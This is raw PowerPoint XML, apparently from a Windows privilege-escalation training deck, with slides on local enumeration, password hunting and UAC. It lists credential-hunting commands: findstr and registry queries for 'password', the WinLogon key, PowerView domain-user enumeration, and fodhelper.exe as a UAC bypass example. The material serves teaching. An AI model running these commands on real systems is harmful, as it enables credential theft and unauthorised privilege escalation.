                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27490DDE-35CC-4A40-8D17-237F6BF6B5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2961837" y="2862469"/>
            <a:ext cx="6268325" cy="800212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{301AF603-F8A6-4A98-8A17-587F0AAAB129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438083" y="4172560"/>
            <a:ext cx="7315834" cy="1196444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24345246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40B2B3-2614-4997-BF4C-4E1EFB5B4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FA04D83-52D6-4F47-9750-72849D498F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Am I Alone?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3BAE5F-25CF-4E1B-B219-AD03FF6EE5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1885949"/>
            <a:ext cx="6538911" cy="4514851"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May need an intermediate step or lateral movement first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net user (/domain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localgroup</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PowerView.ps1: Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DomainUser</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Check c:\users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Check any email on the system for clues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC69DAD-BCE4-44D4-933F-1EDDD8279744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="881" r="38491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6829425" y="2276314"/>
            <a:ext cx="5200650" cy="2305372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10331196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5E18B-FD01-4636-B84D-9C3356CA89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1FADDA0-3500-4E4B-9386-3B23ACDFBC78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ACBFAB1-66A2-43DA-822C-C8157D39B686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="4841240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the hard part</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Looking for uncommon and misconfigured items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At a high level:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for write permissions on services (if you haven’t already)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for user-added software (might not have been in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for email that may indicate lateral movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for passwords/sensitive info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="847601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3D372-415B-4325-B4E3-75C87D509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6FE292D-86FA-4A42-912F-7D4E42473B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C99B8E9-15F6-4A66-8C52-3ACC650654E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="4577499"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for password strings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /SI /M &lt;search&gt; *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ext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ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell: </a:t>
            </a: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ChildItem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Recurse | Select-String &lt;search&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for passwords in Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg query [HKLM|HKCU] /F "password" /T REG_SZ /S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good place to look:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WinLogon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6187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5DFAD6-9CD1-495A-A743-B455EA59D5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31E572C-AE1C-49E9-B148-429D19D4963A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket? – Registry Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B62D45-5CE4-49A3-A31F-D09D8027FA5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1919287" y="1852103"/>
            <a:ext cx="8353425" cy="1819275"/>
            <a:chOff x="1929521" y="1338262"/>
            <a:chExt cx="8353425" cy="1819275"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20959AE4-51E7-42D9-AE09-0B8F68B58986}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1929521" y="1338262"/>
              <a:ext cx="8353425" cy="1819275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22288A98-AA80-4C18-AA46-66C220ACA40E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5008247" y="1338262"/>
              <a:ext cx="4535804"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C078D97-B4DE-47A2-8D4E-B2CCF66F5FCB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2312671" y="2738437"/>
              <a:ext cx="4612003"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16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E073BCBE-3F18-404A-9D22-F9566820BE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596068" y="4422736"/>
            <a:ext cx="11182350" cy="1476375"/>
            <a:chOff x="596068" y="3900487"/>
            <a:chExt cx="11182350" cy="1476375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C83DEC-AC12-46DA-BCB2-C4238563B508}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="596068" y="3900487"/>
              <a:ext cx="11182350" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284236C7-1924-4308-B9CD-00E17685EA0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3703321" y="3918520"/>
              <a:ext cx="8075097"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5DA489D-E120-4CC3-9A5D-D6C8D1C96034}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1017271" y="5000624"/>
              <a:ext cx="4612003"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7" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4312E0-437E-4005-A8DD-0A707CFF8E15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3511382" y="3741287"/>
            <a:ext cx="53517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panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Two ways to get the same info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7973942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0A00B-308D-466C-84EB-EE48FD9166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A3E0869-6B53-4C16-9B4C-3E7C08CFEF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special Note: UAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CB60DD-0CB4-4F6F-A228-5F56A47666B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows gives administrator accounts two access tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default login is with regular user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes have different integrity levels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAC guards access to the administrator token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without GUI, may need a UAC bypass to launch privileged processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: fodhelper.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E016AB-CE66-4990-82D8-8D345D6979AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="6058983"/>
            <a:ext cx="1127464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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Read More: https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1F8BAF-0DF3-48D2-B77B-3FCA03634DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5962722" y="4323296"/>
            <a:ext cx="5910739" cy="1449396"/>
            <a:chOff x="3150864" y="3798230"/>
            <a:chExt cx="5910739" cy="1449396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C162C60-78C8-449B-A460-6C366B30DA8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="19290"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3150865" y="4592249"/>
              <a:ext cx="5910738" cy="655377"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1572EEA0-7DE4-4072-A39E-DBA7E56C308A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect r="19290"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3150864" y="3798230"/>
              <a:ext cx="5910739" cy="572390"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6465073-94EA-4CB8-BB0A-CEBC8A67AB0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3368041" y="4632959"/>
              <a:ext cx="771143" cy="198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24E11008-63FD-4029-8625-F8B323B34EAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4654297" y="4857188"/>
              <a:ext cx="496823" cy="254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0EBD7CC6-E09C-4873-B55C-4964D61AB629}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4765549" y="4046526"/>
              <a:ext cx="702564" cy="275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14" name="Picture 13" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{924DEB6F-EA3E-412D-9205-622F6D929E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233756" y="4137955"/>
            <a:ext cx="3260694" cy="1727890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
